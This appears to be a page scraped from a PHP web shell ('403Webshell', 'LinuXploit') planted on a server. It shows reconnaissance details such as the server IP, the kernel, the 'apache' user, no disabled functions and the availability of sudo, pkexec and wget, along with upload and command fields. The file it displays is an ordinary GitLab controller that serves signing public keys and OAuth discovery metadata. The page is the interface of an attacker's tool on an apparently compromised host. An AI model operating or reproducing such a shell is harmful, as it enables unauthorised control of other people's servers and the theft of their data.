403Webshell
Server IP : 188.151.22.197  /  Your IP : 216.73.217.74
Web Server : Apache/2.4.62 (Rocky Linux) OpenSSL/3.5.5
System : Linux wsten.se 5.14.0-687.30.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jul 27 13:09:21 UTC 2026 x86_64
User : apache ( 48)
PHP Version : 8.1.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /opt/gitlab/embedded/service/gitlab-rails/app/controllers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/gitlab/embedded/service/gitlab-rails/app/controllers/jwks_controller.rb
# frozen_string_literal: true

class JwksController < Doorkeeper::OpenidConnect::DiscoveryController
  include ::Gitlab::EndpointAttributes

  feature_category :system_access

  DYNAMIC_REGISTRATION_PATH = '/oauth/register'

  OAUTH_PATHS = [
    '/.well-known/oauth-authorization-server',
    '/.well-known/oauth-authorization-server/api/v4/mcp',
    '/.well-known/openid-configuration/api/v4/mcp',
    '/.well-known/oauth-authorization-server/api/v4/orbit/mcp',
    '/.well-known/openid-configuration/api/v4/orbit/mcp'
  ].freeze

  def keys
    expires_in 24.hours, public: true, must_revalidate: true, 'no-transform': true

    render json: { keys: payload }
  end

  def provider
    if request.path_info.in?(OAUTH_PATHS)
      expires_in 24.hours, public: true, must_revalidate: true, 'no-transform': true
      response_hash = provider_response
      response_hash[:registration_endpoint] = Gitlab::Utils.append_path(
        Gitlab.config.gitlab.url, DYNAMIC_REGISTRATION_PATH
      )
      render json: response_hash

      return
    end

    super
  end

  private

  def payload
    load_keys.flatten.compact.uniq.map { |key_data| pem_to_jwk(key_data) }
  end

  # overridden in EE
  def load_keys
    [
      ::Rails.application.credentials.openid_connect_signing_key,
      ::Gitlab::CurrentSettings.ci_jwt_signing_key
    ]
  end

  def pem_to_jwk(key_data)
    OpenSSL::PKey::RSA.new(key_data)
        .public_key
        .to_jwk
        .slice(:kty, :kid, :e, :n)
        .merge(use: 'sig', alg: 'RS256')
  end

  def provider_response
    response = super
    response[:claims_supported] += %w[project_path ci_config_ref_uri ref_path sha environment jti]

    if request.path.end_with?('/api/v4/mcp')
      response[:scopes_supported] = [Gitlab::Auth::MCP_SCOPE.to_s]
    elsif request.path.end_with?('/api/v4/orbit/mcp')
      response[:scopes_supported] = [Gitlab::Auth::MCP_ORBIT_SCOPE.to_s]
    end

    response
  end
end

JwksController.prepend_mod

Youez - 2016 - github.com/yon3zu
LinuXploit